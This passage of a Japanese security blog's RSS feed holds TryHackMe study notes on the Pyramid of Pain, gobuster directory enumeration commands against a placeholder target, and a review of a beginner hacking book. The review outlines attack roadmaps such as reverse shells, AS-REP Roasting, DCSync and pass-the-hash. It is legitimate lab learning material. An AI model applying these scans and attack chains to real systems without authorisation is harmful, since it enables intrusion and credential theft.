<li>Any.run解析レポートの簡易解説<br><br>・General Info（基本情報）<br>　サンプルファイル名、ハッシュ値（MD5, SHA1, SHA256）、実行環境などが記載されている。<br><br>・Behavior Activities（挙動）<br>　Malicious（悪意あり）、Suspicious（不審）、Info（情報レベル）。<br><br>・Malware configuration（マルウェアの設定情報）<br>　マルウェアが内部に持つ設定パラメータ。<br>　マルウェアの「行動方針」や「攻撃先」「通信手段」などが書かれている。<br><br>・Static Information（スタティック情報）<br>　マルウェアファイルそのものを実行せずに解析して得られる基本的な情報。<br><br>・Video and Screenshots（ビデオとスクリーンショット）<br>　マルウェアの挙動を記録・可視化した映像と画面キャプチャ。<br><br>・Processes（プロセス）<br>　作成・実行されたすべてのプロセスの詳細な動きを可視化。<br><br>・Registry Activity（レジストリ操作の記録）<br>　マルウェアがレジストリキーや値を「読み取り・作成・変更・削除」した履歴を時系列で記録。<br>　永続化（自動起動）・構成変更・痕跡隠蔽・情報収集などの重要な行動の証拠になる。<br><br>・Files Activity（ファイルの操作履歴）<br>　マルウェアがどのファイルを作ったか、変更したか、消したかを記録。<br>　実際に何を「感染先に落とす（ドロップ）」かを確認できる重要な手がかり。<br><br>・Network Activity（ネットワーク通信の記録）<br>　マルウェアが外部と通信した IPアドレスやドメイン名、プロトコル、ポート番号などを一覧で表示<br>　C2サーバー（攻撃者の遠隔操作先）との通信、ファイルダウンロード、情報送信などの証拠を発見できる<br><br>・Debug output strings<br>　実行中のマルウェアやプログラムが内部的に出力したデバッグメッセージのログを表示する。</li>
</ul>



<h3 class="wp-block-heading">Task&nbsp;6　Network Artifacts (Annoying)</h3>



<ul class="wp-block-list">
<li>tshark<br>コマンドラインのパケット解析ツール。<br><br></li>



<li>User-Agentの代表例<br>IE系: MSIE、Trident<br>Chrome系: Chrome/xx<br>Firefox系: Firefox/xx<br>Safari系: Safari/xxx（ただしChromeにも含まれるので注意）<br><br></li>



<li>設問：上記のスクリーンショットに表示されている User-Agent 文字列を使用するブラウザはどれですか? のヒント<br><br>User-Agent 文字列<br><code>Mozilla/4.0 (compatible; <span class="swl-inline-color has-swl-deep-01-color">MSIE 7.0</span>; Windows NT 6.1; <span class="swl-inline-color has-swl-deep-01-color">Trident/7.0</span>; …)</code><br><br>MSIE 7.0 と書かれている → 「Internet Explorer 7」に見せかけている。<br>しかし、Trident/7.0 というIE互換レンダリングエンジンが使われている → これは Internet Explorer 11 が使うエンジン。<br>つまり本当は Internet Explorer 11 で、互換モードを示す UA を偽装しているケース。<br><br></li>



<li>なぜUser-Agentを偽装するのか<br>検知回避（evasion technique）のため。<br><br>・古いInternet Explorer（IE7など）を偽装すると、大量に存在する正常なトラフィックと同じように見えるため、セキュリティ監視の目から隠れやすくなる。<br><br>・セキュリティ機器は、User-Agent の文字列に応じて検査の深さを変える場合があり、古いブラウザに特化した通信は「既知の安全なもの」として扱われ、詳細な検査をスキップすることがある。<br><br>・「IE 7.0」など人間が普通に使っていそうなものはホワイトリストに入っているケースもあり、ブロックを回避できる。</li>
</ul>



<h3 class="wp-block-heading">Task&nbsp;7　Tools (Challenging)</h3>



<ul class="wp-block-list">
<li>fuzzy hash<br>似ているファイル同士を比較するためのハッシュ技術。<br> 通常のハッシュ（MD5、SHA256など）では不可能な、「類似度の比較」ができる。<br><br></li>



<li>SSDEEP<br>fuzzy hashの一種。<br>ファイルを小さなブロック単位で比較し、類似性に基づくハッシュ（fuzzy hash）を生成。</li>
</ul>



<h3 class="wp-block-heading">Task&nbsp;8　TTPs (Tough)</h3>



<ul class="wp-block-list">
<li><a href="https://attack.mitre.org/" target="_blank" rel="noreferrer noopener">MITRE&nbsp;&nbsp;ATT&amp;CK</a><br>サイバー攻撃者が現実に使う戦術（Tactics）、技術（Techniques）、手順（Procedures）を体系的にまとめたナレッジベース。<br><br>たとえば、Task5のレポートの場合、MITRE&nbsp;&nbsp;ATT&amp;CKに照らし合わせると<br><br>&#8211; 初期アクセス：<a href="https://attack.mitre.org/techniques/T1566/001/" data-type="link" data-id="https://attack.mitre.org/techniques/T1566/001/">T1566.001</a>（スピアフィッシング＋添付ファイル）<br>&#8211; 実行：<a href="https://attack.mitre.org/techniques/T1059/001/" data-type="link" data-id="https://attack.mitre.org/techniques/T1059/001/">T1059.001</a>（PowerShell）<br>&#8211; C2通信：<a href="https://attack.mitre.org/techniques/T1071/001/" data-type="link" data-id="https://attack.mitre.org/techniques/T1071/001/">T1071.001</a>（HTTPなど）<br><br>などが該当する。</li>
</ul>



<h3 class="wp-block-heading">Task&nbsp;9　Practical: The Pyramid of Pain</h3>



<p>Pyramid of Painの演習問題。<br>各IoCレベル（ハッシュ値・IPアドレス・ドメインなど）の特徴を理解していれば解答可能。</p>



<h3 class="wp-block-heading">Task&nbsp;10　Conclusion</h3>



<ul class="wp-block-list">
<li><a href="https://docs.rapid7.com/insightidr/apt-groups/" data-type="link" data-id="https://docs.rapid7.com/insightidr/apt-groups/">Rapid7 の Advanced Persistent Threat Groups (APT Groups)</a><br>Rapid7（ラピッドセブン）社 が公開している脅威インテリジェンス情報のまとめページ／ナレッジベース。</li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>https://cybermemo.blog/tryhackme-pyramid-of-pain/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>TryHackMe Offensive Security Intro — 学習メモ</title>
		<link>https://cybermemo.blog/tryhackme-offensive-security-intro</link>
					<comments>https://cybermemo.blog/tryhackme-offensive-security-intro#respond</comments>
		
		<dc:creator><![CDATA[miyuki]]></dc:creator>
		<pubDate>Sat, 20 Sep 2025 01:05:04 +0000</pubDate>
				<category><![CDATA[TryHackMe]]></category>
		<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[dirb]]></category>
		<category><![CDATA[gobuster]]></category>
		<category><![CDATA[wordlist]]></category>
		<guid isPermaLink="false">https://cybermemo.blog/?p=157</guid>

					<description><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/TryHackMe用アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>はじめに Offensive Security Introの備忘録。本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。 つまずいたことと解決策 名前解決ができない http://TARGET_ [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/TryHackMe用アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>
<h2 class="wp-block-heading">はじめに</h2>



<p>Offensive Security Introの備忘録。<br>本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。</p>


<div class="swell-block-postLink">			<div class="p-blogCard -external" data-type="type3" data-onclick="clickLink">
				<div class="p-blogCard__inner">
					<span class="p-blogCard__caption">TryHackMe</span>
					<div class="p-blogCard__thumb c-postThumb"><figure class="c-postThumb__figure"><img decoding="async" src="https://tryhackme-images.s3.amazonaws.com/room-icons/presec-room-image1.png" alt="" class="c-postThumb__img u-obf-cover" width="320" height="180"></figure></div>					<div class="p-blogCard__body">
						<a class="p-blogCard__title" href="https://tryhackme.com/room/offensivesecurityintro" target="_blank" rel="noopener noreferrer">Offensive Security Intro</a>
						<span class="p-blogCard__excerpt">Hack your first website (legally in a safe environment) and experience an ethical hacker&#8217;s job.</span>					</div>
				</div>
			</div>
		</div>


<h2 class="wp-block-heading">つまずいたことと解決策</h2>



<h3 class="wp-block-heading">名前解決ができない</h3>



<p>http://TARGET_HOSTの名前解決ができないのでhostsファイルに追記。</p>



<pre class="wp-block-code"><code># 一時的に /etc/hosts に追加（sudo 必要）
echo "IPアドレス	TARGET_HOST" | sudo tee -a /etc/hosts

# hosts が有効に使われているか確認
getent hosts TARGET_HOST

# ping（ネットワーク疎通）
ping -c 3 TARGET_HOST

# HTTP ヘッダ確認（ポート80で応答があるか）
curl -I http://TARGET_HOST || true</code></pre>



<h3 class="wp-block-heading">dirbが遅い</h3>



<p>TryHackMeの指示通りにdirbで探索すると30分近くかかってしまったので、以降はgobusterで代用。</p>



<p>gobusterのインストールとバージョン確認。</p>



<pre class="wp-block-code"><code># インストールされているか確認（返ればインストール済み）
command -v gobuster &amp;&amp; echo "installed" || echo "not installed"

# バージョン確認
gobuster version</code></pre>



<p>実行してみる。2～3分くらいで完了。</p>



<pre class="wp-block-code"><code># gobusterで高速ディレクトリ列挙（threads=40, 拡張子絞り）
gobuster dir -u http://TARGET_HOST -w ~/small-common.txt -t 40 -x php,html,txt,zip,tar -o gobuster_small.out</code></pre>



<h3 class="wp-block-heading">ディレクトリが見つからない</h3>



<p>教材の例では <code>bank-deposit</code> ディレクトリが見つかることになっているが、手元の環境ではヒットしなかった。</p>



<pre class="wp-block-code"><code>Gobuster v3.6
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)

&#91;+] Url:                     http://TARGET_HOST
&#91;+] Method:                  GET
&#91;+] Threads:                 40
&#91;+] Wordlist:                /usr/share/dirb/wordlists/common.txt
&#91;+] Negative Status codes:   404
&#91;+] User Agent:              gobuster/3.6
&#91;+] Extensions:              php,html,txt
&#91;+] Timeout:                 10s

Starting gobuster in directory enumeration mode

/css               (Status: 301) &#91;Size: 173] &#91;--> /css/]
/fonts             (Status: 301) &#91;Size: 177] &#91;--> /fonts/]
/images            (Status: 301) &#91;Size: 179] &#91;--> /images/]
/Images            (Status: 200) &#91;Size: 10373]
/js                (Status: 301) &#91;Size: 171] &#91;--> /js/]

Progress: 18456 / 18460 (99.98%)

Finished</code></pre>



<p>common.txtでbank-depositがヒットしないのでこれが原因のよう。</p>



<pre class="wp-block-code"><code>grep -n 'bank-deposit' /usr/share/dirb/wordlists/common.txt || true</code></pre>



<p>directory-list-2.3-medium.txtでも見つからない。</p>



<pre class="wp-block-code"><code>grep -n 'bank-deposit' /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt || true</code></pre>



<p>仕方ないのでワードリストを作ってヒットさせる。</p>



<pre class="wp-block-code"><code>#ワードリスト"mylist.txt"を作成
echo -e "bank-deposit\nbankdeposit\nbank" > ~/mylist.txt

#mylist.txtで探索
gobuster dir -u http://TARGET_HOST -w ~/mylist.txt -t 40 -x php,html,txt,zip,tar -o gobuster_small.out</code></pre>
]]></content:encoded>
					
					<wfw:commentRss>https://cybermemo.blog/tryhackme-offensive-security-intro/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>ハッキング初心者が『7日間でハッキングをはじめる本』をやってみた</title>
		<link>https://cybermemo.blog/tryhackme-7days-book</link>
					<comments>https://cybermemo.blog/tryhackme-7days-book#respond</comments>
		
		<dc:creator><![CDATA[miyuki]]></dc:creator>
		<pubDate>Wed, 17 Sep 2025 11:51:14 +0000</pubDate>
				<category><![CDATA[TryHackMe]]></category>
		<category><![CDATA[セキュリティ]]></category>
		<guid isPermaLink="false">https://cybermemo.blog/?p=62</guid>

					<description><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/ハッキング初心者が7日間でハッキングをはじめる本をやってみた_アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>はじめに TryHackMeとは TryHackMe（トライハックミー） は、世界中で人気のあるサイバーセキュリティ学習プラットフォームです。クラウド上に用意された仮想環境を使って、ハッキング技術やセキュリティ対策を実際 [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/ハッキング初心者が7日間でハッキングをはじめる本をやってみた_アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>
<h2 class="wp-block-heading">はじめに</h2>



<h3 class="wp-block-heading">TryHackMeとは</h3>



<p>TryHackMe（トライハックミー） は、世界中で人気のあるサイバーセキュリティ学習プラットフォームです。<br>クラウド上に用意された仮想環境を使って、ハッキング技術やセキュリティ対策を実際に手を動かしながら学べるのが特徴です。環境構築がほぼ不要で無料の会員登録だけでハッキング演習をできるので、ハッキングをやってみたいけれど、何から始めればいいのか分からない方に特におすすめです。</p>


<div class="swell-block-postLink">			<div class="p-blogCard -external" data-type="type3" data-onclick="clickLink">
				<div class="p-blogCard__inner">
					<span class="p-blogCard__caption">TryHackMe</span>
					<div class="p-blogCard__thumb c-postThumb"><figure class="c-postThumb__figure"><img decoding="async" src="https://tryhackme.com/img/meta/default.png" alt="" class="c-postThumb__img u-obf-cover" width="320" height="180"></figure></div>					<div class="p-blogCard__body">
						<a class="p-blogCard__title" href="https://tryhackme.com/" target="_blank" rel="noopener noreferrer">TryHackMe | Cyber Security Training</a>
						<span class="p-blogCard__excerpt">TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!</span>					</div>
				</div>
			</div>
		</div>


<h3 class="wp-block-heading">7日間でハッキングをはじめる本とは</h3>



<p>TryHackMeを利用してハッキングをしてみる本です。<br>最初は環境構築からはじまり、簡単な攻撃や各種ハッキングツールの利用方法などが学べます。<br>環境構築から始まるため、初心者でもつまずかずにTryHackMeに挑戦できる良書でした。<br>初心者向けのため、業務経験がある方や、すでに勉強を始めている方には物足りないかもしれません。<br><br>本書によると前提条件・知識は<br>①自分のパソコンを持っている：必須<br>②インターネットにつながる環境がある:必須<br>③ Linuxを触ったことがある：推奨<br>　・黒い画面にアレルギ-がない<br>　・ ls 、 cd 、cat などの基本的なコマンドを使って操作することができる<br>とのことです。</p>


<div class="swell-block-postLink">			<div class="p-blogCard -external" data-type="type3" data-onclick="clickLink">
				<div class="p-blogCard__inner">
					<span class="p-blogCard__caption">Shoeisha</span>
					<div class="p-blogCard__thumb c-postThumb"><figure class="c-postThumb__figure"><img decoding="async" src="https://www.shoeisha.co.jp/static/book/og_image/9784798181578.jpg" alt="" class="c-postThumb__img u-obf-cover" width="320" height="180"></figure></div>					<div class="p-blogCard__body">
						<a class="p-blogCard__title" href="https://www.shoeisha.co.jp/book/detail/9784798181578" target="_blank" rel="noopener noreferrer">7日間でハッキングをはじめる本  TryHackMeを使って身体で覚える攻撃手法と脆弱性 | 翔泳社</a>
						<span class="p-blogCard__excerpt">サイバーセキュリティ学習サイトを攻略しながら ハッキング／セキュリティの「基本」を体験しよう サイバー攻撃の増加に伴い、セキュリティを専門にしないITエンジニアであ&#8230;</span>					</div>
				</div>
			</div>
		</div>


<h3 class="wp-block-heading">この本を手に取ったきっかけ</h3>



<p>CISSPに合格したもののインプットだけでアウトプットができていなかったので次は手を動かした勉強がしてみたいと思い、初心者向けらしいこの本から取り掛かってみることにしました。特に「この本でなければいけない!」というこだわりはありませんでしたが、ハッキング最初の一歩としては正解の一冊だったと感じています。<br><br>ちなみにCISSP合格体験記も書いているので興味があればご覧下さい。</p>


<div class="swell-block-postLink">			<div class="p-blogCard -external" data-type="type3" data-onclick="clickLink">
				<div class="p-blogCard__inner">
					<span class="p-blogCard__caption">セキュリティエンジニアの雑多ブロ&#8230;</span>
					<div class="p-blogCard__thumb c-postThumb"><figure class="c-postThumb__figure"><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/09/CISSP合格体験記.png" alt="" class="c-postThumb__img u-obf-cover" width="320" height="180"></figure></div>					<div class="p-blogCard__body">
						<a class="p-blogCard__title" href="https://cybermemo.blog/cissp-pass" target="_blank" rel="noopener noreferrer">CISSP合格体験記2025｜独学3か月・170時間の勉強で一発合格！</a>
						<span class="p-blogCard__excerpt">2025年8月にCISSP試験に合格しました。勉強期間3か月・170時間で使用した教材や模擬試験の結果、試験当日の流れ、合格のポイントを詳しくまとめています。</span>					</div>
				</div>
			</div>
		</div>


<h2 class="wp-block-heading">Day1～Day7</h2>



<p>本書はタイトルの通り7日間で無理なく学べるように内容が区切られています。<br>目標がはっきりしているので取り組みやすかったです。<br>各日の内容は以下のとおりです。<br><br>Day1 ハッキングの準備をしよう<br>Day2 はじめてのハッキング<br>Day3 悪用厳禁のエクスプロイトを試してみよう<br>Day4 よくある脆弱性を使って怪しいショップで遊ぼう<br>Day5 Webフォームから侵入しよう<br>Day6 Active Directoryのハッキング実践<br>Day7 WordPressのハッキング実践</p>



<h3 class="wp-block-heading">Day1 ハッキングの準備をしよう</h3>



<p>まずは環境構築です。<br>Kali LinuxやVirtual Boxのインストール、TryHackMeの登録などを行います。<br><br>私はLinuxの業務経験があったので特に難しいと感じることはなかったですが、設定したパスワードをタイプミスして<br>Linuxにログインできなくなるというまさかの凡ミスをしました。実務でやってしまうと非常にまずい。気を付けなければ。<br><br>後はInternal Virtual IP Addressが0.0.0.0のまま変わらず躓きました。<br>他の方のブログを見ていても同じ事象が起きているようで、最終的にここは変わっていなくてもVPN接続ができていれば問題なさそうだったので本書の通りとはいかなかったですが、そのまま進めました。<br></p>



<figure class="wp-block-image size-full"><img decoding="async" width="861" height="280" src="https://cybermemo.blog/wp-content/uploads/2025/09/OpenVPN-Access-Details.png" alt="" class="wp-image-131" srcset="https://cybermemo.blog/wp-content/uploads/2025/09/OpenVPN-Access-Details.png 861w, https://cybermemo.blog/wp-content/uploads/2025/09/OpenVPN-Access-Details-300x98.png 300w, https://cybermemo.blog/wp-content/uploads/2025/09/OpenVPN-Access-Details-768x250.png 768w" sizes="(max-width: 861px) 100vw, 861px" /></figure>



<h3 class="wp-block-heading">Day2 はじめてのハッキング</h3>



<p>ここからが本書の本題です。<br>このセクションでは辞書攻撃とマシンへの侵入を行います。<br><br>ここで利用するツールは以下のとおりです。<br>・nmap<br>・dirb(辞書ファイルはsmall.txt)<br>・hydra(辞書ファイルはrockyou.txt)<br><br>本書の通りにやっていれば特に問題なく進めるかと思います。<br>本書を進めていくと色々なツールが出てきてだんだん分からなくなってくるので、何の目的でツールを使っているのか、自分は今攻撃のどの段階にいるのか一言メモなどで残しておくといいかもしれません。<br><br>【本セクションでの個人的メモ】<br>・dirbとhydraの違い<br>　どちらもブルートフォース系のツール<br>　dirb→ディレクトリ探索用<br>　hydra→認証システム用<br>・ロードマップ<br>　1.ポートスキャン<br>　2.ディレクトリ探索<br>　3.共有フォルダーへ侵入<br>　4.辞書攻撃<br>　5.侵入</p>



<h3 class="wp-block-heading">Day3 悪用厳禁のエクスプロイトを試してみよう</h3>



<p>このセクションでは脆弱性を悪用したマシンへの侵入と侵害を行います。<br><br>ここで利用するツールは以下のとおりです。<br>・nmap<br>・Metasploit<br>・xfreerdp<br><br>今回のターゲットマシンはWindowsです。<br>Windowsの業務経験がなかったので少し不安でしたが、事前知識がなくても問題なく進められました。<br><br>【本セクションでの個人的メモ】<br>・Metasploitの「モジュール」と「ペイロード」<br>　モジュール→攻撃や支援のための部品<br>　ペイロード→エクスプロイト成功後にターゲット上で実行されるコード<br>・ロードマップ<br>　1.ポートスキャン<br>　2.脆弱性調査<br>　3.脆弱性を悪用したマシンへの侵入<br>　4.ターゲットマシンの操作<br>　5.情報窃取</p>



<h3 class="wp-block-heading">Day4 よくある脆弱性を使って怪しいショップで遊ぼう</h3>



<p>このセクションではWebサービスへの侵入と侵害を行います。<br><br>ここで利用するツールは以下のとおりです。<br>・BurpSuite(辞書ファイルはbest1050.txt)<br><br>このあたりから本格的なハッキングになってきます。<br>BurpSuiteは初めて触ったのですが、HTTPログの閲覧、デベロッパーツール、POSTデータの改変など簡単に便利機能を使えて感動しました。<br><br>【本セクションでの個人的メモ】<br>・ロードマップ<br>　1.Webサイトを探索<br>　　├ユーザー登録<br>　　└レビュー投稿<br>　2.SQLインジェクション、管理画面アクセス<br>　3.サイト改変<br>　4.辞書攻撃</p>



<h3 class="wp-block-heading">Day5 Webフォームから侵入しよう</h3>



<p>このセクションではWebフォームへの侵入と権限昇格を行います。<br><br>ここで利用するツールは以下のとおりです。<br>・nmap<br>・FTP<br>・dirb<br>・BurpSuite(辞書ファイルはextensions-most-common.fuzz.txt)<br>・リバースシェル(php-reverse-shell.php)<br><br>内容が濃くなってきて今まで1時間30分～2時間程度でセクション完了していましたが、3時間くらいかかるようになってきました。<br>今回は初期侵入→権限昇格と現実のハッカーっぽい挙動です。<br><br>【本セクションでの個人的メモ】<br>・SUID<br>　実行時に「ファイル所有者」の権限で動作する。典型例はpasswd。<br>・ロードマップ<br>　1.ポートスキャン<br>　2.FTPへの侵入→失敗<br>　3.サイト調査<br>　　└ディレクトリ探索<br>　4.アップロードフォーム調査<br>　　└利用可能拡張子の探索<br>　5.リバースシェルによる初期侵入<br>　6.権限昇格</p>



<h3 class="wp-block-heading">Day6 Active Directoryのハッキング実践</h3>



<p>このセクションではActive Directoryのハッキングを行います。<br><br>ここで利用するツールは以下のとおりです。<br>・nmap<br>・Kerbrute<br>・Impacket<br>・hashcat<br>・Evil-WinRM<br><br>Kerberos認証やNTLM認証などが登場してきました。これらは仕組みを知らなかった人には少し難しく感じるかもしれません。私自身もActive Directoryへの攻撃に詳しくなかったのでAS-REP Roasting攻撃やDCsync攻撃は初めて知りました。個人的にはこのセクションが最も難しかったです。<br><br>【本セクションでの個人的メモ】<br>・Kerbrute<br>　Kerberos環境での「ユーザー列挙」や簡単なブルートフォースを行うツール<br>・Impacket<br>　Pythonベースのライブラリ兼ツール群で、Windows/AD のプロトコル(SMB, DCE/RPC, Kerberosなど)を操作するための実装集<br>・hashcat<br>　GPU(やCPU)で超高速にハッシュを総当たり／辞書攻撃するためのパスワードクラッキングツール<br>・Evil-WinRM<br>　Windows 標準のWinRM(Windows Remote Management)サービスを使ってPowerShellリモートシェルを得るためのツール<br>・AS-REP Roasting攻撃<br>　Pre-Authentication(事前認証)を無効化しているアカウントに対してAS-REQを送り、KDCが返す暗号化された応答(AS-REP)を取得し、オフラインで解析(総当たり／辞書攻撃)してパスワードを推測する攻撃<br>・DCsync攻撃<br>　ADのレプリケーション機能(Directory Replication Service Remote Protocol, MS-DRSR)を悪用して、ドメインコントローラから直接ユーザーのハッシュ(NTLMなど)やkrbtgtのハッシュを取得する攻撃<br>・ロードマップ<br>　1.ポートスキャン<br>　2.ポートスキャン(詳細調査)<br>　3.Kerbruteによる辞書攻撃でユーザー名を割り出す<br>　4.上記3で入手したユーザー名を使いAS-REP Roasting攻撃<br>　5.hashcatでハッシュ値からパスワードを特定<br>　6.得られたユーザー名とパスワードを使い、共有フォルダーを探索(ここで別ユーザのパスワードを発見)<br>　7.上記6で見つけたユーザーはバックアップ用のユーザーなのでDCsync攻撃<br>　8.上記7のDCsync攻撃で得られたAdministratorでPass the Hash攻撃</p>



<h3 class="wp-block-heading">Day7 WordPressのハッキング実践</h3>



<p>ついに最後のセクションです。<br>このセクションではWordPressのハッキングを行います。<br><br>ここで利用するツールは以下のとおりです。<br>・steghide<br>・wpscan(辞書ファイルはrockyou.txt)<br>・Metasploit<br>・LinPEAS<br><br>このサイトもWordPressで作成しているため実際にハッキングしていて恐怖を感じました。(もちろんセキュリティには気を付けていますが…)<br>最後のセクションなので長丁場になるかと思いましたが、Day6よりも時間がかからず比較的簡単でした。<br><br>【本セクションでの個人的メモ】<br>・LinPEAS<br>　Linuxシステム用の権限昇格に使える設定ミスを教えてくれるツール。Windows用はWinPEAS、Mac用はMacPEAS。<br>・ロードマップ<br>　1.ポートスキャン<br>　2.共有フォルダーへ侵入<br>　3.共有フォルダーからダウンロードしたファイルの解析<br>　4.WordPressの探索<br>　5.WordPress脆弱性を悪用し初期侵入<br>　6.権限昇格</p>



<h2 class="wp-block-heading">感想</h2>



<p>楽しかったです!<br>上述の通り、CISSP合格後のアウトプットのために始めたので、終始「これCISSP(の練習問題)でやったところだ！」とテンション上がりっぱなしでした。<br>しかし、以前にLinuxの勉強はしていてそれなりにできると思っていたのですが、SUIDなどについて一瞬、「それって何だっけ？」となってしまう場面があり、愕然としました。<br>もう数年Linuxの業務から離れていたので知っていて当たり前のことが曖昧になっているようです。<br>新しいスキルを身に付けるだけでなく、一度勉強したことも定期的に振り返らないとまずいですね。<br>この本でTryHackMeの取り組み方については理解できたと思うので、これからはLinuxの復習をしつつどんどん新しいルームにも取り組んでみようと思います。</p>
]]></content:encoded>
					
					<wfw:commentRss>https://cybermemo.blog/tryhackme-7days-book/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
